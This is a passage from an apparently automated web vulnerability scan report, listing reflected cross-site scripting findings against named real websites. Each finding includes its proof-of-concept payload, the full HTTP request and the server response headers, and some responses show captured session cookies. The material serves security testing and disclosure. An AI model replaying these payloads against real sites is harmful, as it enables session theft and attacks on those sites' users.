This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /LinkCollector?key=N9R97TT5119K7784f<script>alert(1)</script>2c6f007e0c6 HTTP/1.1 Host: www.survey-xact.dk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:36:47 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Last-Modified: Sun, 21 Nov 2010 21:36:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 130 Connection: close
1.417. http://www.thatsfit.com/2009/11/30/master-cleanse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thatsfit.com
Path:
/2009/11/30/master-cleanse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b254"><script>alert(1)</script>327833fa669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/11/30/master-cleanse/?3b254"><script>alert(1)</script>327833fa669=1 HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17eac"a%3d"b"5eeff4b7abf was submitted in the REST URL parameter 2. This input was echoed as 17eac"a="b"5eeff4b7abf in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /electronics/home-entertainment17eac"a%3d"b"5eeff4b7abf/cf9b/ HTTP/1.1 Host: www.thinkgeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the k request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2a931'><script>alert(1)</script>0fbdc113263 was submitted in the k parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Issues/2010/October-2010/Pages/Getting-a-Grip-on-Intangibles.aspx?k=Deloitte2a931'><script>alert(1)</script>0fbdc113263 HTTP/1.1 Host: www.treasuryandrisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Length: 231344 Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 20:34:59 GMT Last-Modified: Sun, 21 Nov 2010 21:34:59 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXAUTH=96C687AF75EAF1228BEE360E0F7558C1F365ED67A0C36EB5EF3285E1382CC66CD57CB01A56140FC92C6378568B7D3B25CCFD3FD46148D8F1E9AF0AAE5CF7A509384697D2703F4F40E04AD679C5A3BDB4; expires=Sun, 21-Nov-2010 22:04:59 GMT; path=/; HttpOnly Set-Cookie: ASP.NET_SessionId=kppok455ja5nfc45z5r3dk55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sun, 21 Nov 2010 21:34:59 GMT Connection: close
1.420. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tuaw.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b942f"-alert(1)-"0fce9fc0f52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b942f"-alert(1)-"0fce9fc0f52=1 HTTP/1.1 Host: www.tuaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fd83d<img%20src%3da%20onerror%3dalert(1)>759a1e7887a was submitted in the REST URL parameter 4. This input was echoed as fd83d<img src=a onerror=alert(1)>759a1e7887a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /S1/RX1ANT/2LVIU6XP/Mfd83d<img%20src%3da%20onerror%3dalert(1)>759a1e7887a/ HTTP/1.1 Host: www.twelvehorses.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the categoryName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7923"%3balert(1)//adb25866d07 was submitted in the categoryName parameter. This input was echoed as e7923";alert(1)//adb25866d07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /merchandise/HPCategoryList.aspx?parentCategory=harrypotter%28merchandisebasecatalog%29&categoryName=harrypotter%28merchandisebasecatalog%29e7923"%3balert(1)//adb25866d07 HTTP/1.1 Host: www.universalorlando.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK X-Cnection: close Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 21:35:29 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASP.NET_SessionId=yjnoeh550s4sww3j3nbxd2vf; path=/; HttpOnly Set-Cookie: Click2Click=USER_ID=50864001; expires=Sun, 22-Nov-2015 02:39:18 GMT; path=/ Set-Cookie: encrypted_store_cookie=pv54ayyvfhA5AnfRZw4zqNqjmR7/cLr2UB6R0pPvDyVTtZSFL7gKp7dFBB8BNBkpmYmUly8lVGkpqvw=; expires=Tue, 23-Nov-2010 21:35:29 GMT; path=/ Content-Length: 93335
The value of the CategoryName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2b4'%3balert(1)//3baada0924e was submitted in the CategoryName parameter. This input was echoed as cd2b4';alert(1)//3baada0924e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /merchandise/HPProductDetail.aspx?ProductId=39366a9a-28f4-4381-a53a-d97d68261639%28MerchandiseBaseCatalog%29&parentCategory=harrypotter%28merchandisebasecatalog%29&CategoryName=cd2b4'%3balert(1)//3baada0924e HTTP/1.1 Host: www.universalorlando.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK X-Cnection: close Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 21:35:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASP.NET_SessionId=4uhshg451udzphvb4iy11eug; path=/; HttpOnly Set-Cookie: Click2Click=USER_ID=50864064; expires=Sun, 22-Nov-2015 02:39:30 GMT; path=/ Set-Cookie: encrypted_store_cookie=ZS6pitvZzwMRDMafpS9JgSmgkXrnwKj+dmMA3AZXo6D2aw1WisjfAdUE7mYJNc0NFVx2GeQ6/NyK0/4=; expires=Tue, 23-Nov-2010 21:35:41 GMT; path=/ Content-Length: 134012
The value of the CategoryName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7cea5%3balert(1)//254af69b79b was submitted in the CategoryName parameter. This input was echoed as 7cea5;alert(1)//254af69b79b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /merchandise/HPProductDetail.aspx?ProductId=39366a9a-28f4-4381-a53a-d97d68261639%28MerchandiseBaseCatalog%29&parentCategory=harrypotter%28merchandisebasecatalog%29&CategoryName=HarryPotter|Zonko|Zonko%27s%28MerchandiseBaseCatalog%297cea5%3balert(1)//254af69b79b HTTP/1.1 Host: www.universalorlando.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK X-Cnection: close Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 134208 Date: Sun, 21 Nov 2010 21:35:42 GMT Connection: close Set-Cookie: ASP.NET_SessionId=ypru0jexosnezleaqjrfp2qr; path=/; HttpOnly Set-Cookie: Click2Click=USER_ID=50864069; expires=Sun, 22-Nov-2015 02:39:31 GMT; path=/ Set-Cookie: encrypted_store_cookie=Ie5KL6k6H4mS85GfpS9JgSmgkXrnwJ3HBgLSN3S4ikuc7REMftxSYbDRDXONEWXKCKcO9/fn1N58ifI=; expires=Tue, 23-Nov-2010 21:35:42 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <!--[if lt ...[SNIP]...
The value of the CategoryName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b951f"%3balert(1)//2f8badf28b8 was submitted in the CategoryName parameter. This input was echoed as b951f";alert(1)//2f8badf28b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /merchandise/HPProductList.aspx?CategoryName=HarryPotter|Ollivanders|Collectibles%28MerchandiseBaseCatalog%29b951f"%3balert(1)//2f8badf28b8&parentCategory=harrypotter%28merchandisebasecatalog%29 HTTP/1.1 Host: www.universalorlando.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK X-Cnection: close Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 21:35:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASP.NET_SessionId=ntscke55sd5kr4iphkqwuj55; path=/; HttpOnly Set-Cookie: Click2Click=USER_ID=50864043; expires=Sun, 22-Nov-2015 02:39:26 GMT; path=/ Set-Cookie: encrypted_store_cookie=VRELtdJL2M2wlYWfpS9JgSmgkXrnwHQeoOiH4wr3MKz7OhSFO1s7YPqdecjviLsi/izRO3CaUwi+1hk=; expires=Tue, 23-Nov-2010 21:35:37 GMT; path=/ Content-Length: 96009
1.426. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.usdbriefs.com
Path:
/calendar/thyme/thyme/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7f8b'><img%20src%3da%20onerror%3dalert(1)>38d2c129f90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7f8b'><img src=a onerror=alert(1)>38d2c129f90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /calendar/thyme/thyme/index.php/a7f8b'><img%20src%3da%20onerror%3dalert(1)>38d2c129f90 HTTP/1.1 Host: www.usdbriefs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:36:02 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.14 Set-Cookie: d51493120e269b3e123d4dfe3ef8003e=60cb340736fb5e2d68dde3866acdf8d0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 182957
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
1.427. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.usdbriefs.com
Path:
/calendar/thyme/thyme/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99115"><script>alert(1)</script>ae34abbec08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /calendar/thyme/thyme/index.php/99115"><script>alert(1)</script>ae34abbec08 HTTP/1.1 Host: www.usdbriefs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:35:54 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.14 Set-Cookie: d51493120e269b3e123d4dfe3ef8003e=ddb1b6cdd7e3a89e6dae230ca78f76d5; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 181694
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3bf"><a>5de4eb6055f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax9e3bf"><a>5de4eb6055f/widgets/related/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:13:57 GMT Date: Mon, 22 Nov 2010 01:10:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax9e3bf"><a>5de4eb6055f ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b57b"><a>764ea10e8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets1b57b"><a>764ea10e8d2/related/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:14:29 GMT Date: Mon, 22 Nov 2010 01:10:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets1b57b"><a>764ea10e8d2 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf640"><a>99098f04c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedbf640"><a>99098f04c4b/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:05 GMT Date: Mon, 22 Nov 2010 01:11:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedbf640"><a>99098f04c4b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d1"><a>9e67eb28264 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax8f0d1"><a>9e67eb28264/widgets/related/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax8f0d1"><a>9e67eb28264 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f855"><a>144ef7ca22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets4f855"><a>144ef7ca22/related/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets4f855"><a>144ef7ca22 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5558d"><a>877c7a8d468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related5558d"><a>877c7a8d468/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:11 GMT Date: Mon, 22 Nov 2010 01:11:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related5558d"><a>877c7a8d468"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e30b"><a>f706f81ec9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax9e30b"><a>f706f81ec9d/widgets/related/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax9e30b"><a>f706f81ec9d ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be84"><a>0968336159a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets4be84"><a>0968336159a/related/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Mon, 22 Nov 2010 01:14:44 GMT Date: Mon, 22 Nov 2010 01:10:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets4be84"><a>0968336159a c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f77cf"><a>7b2d4dc85a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedf77cf"><a>7b2d4dc85a2/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:09 GMT Date: Mon, 22 Nov 2010 01:11:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedf77cf"><a>7b2d4dc85a2"> ...[SNIP]...
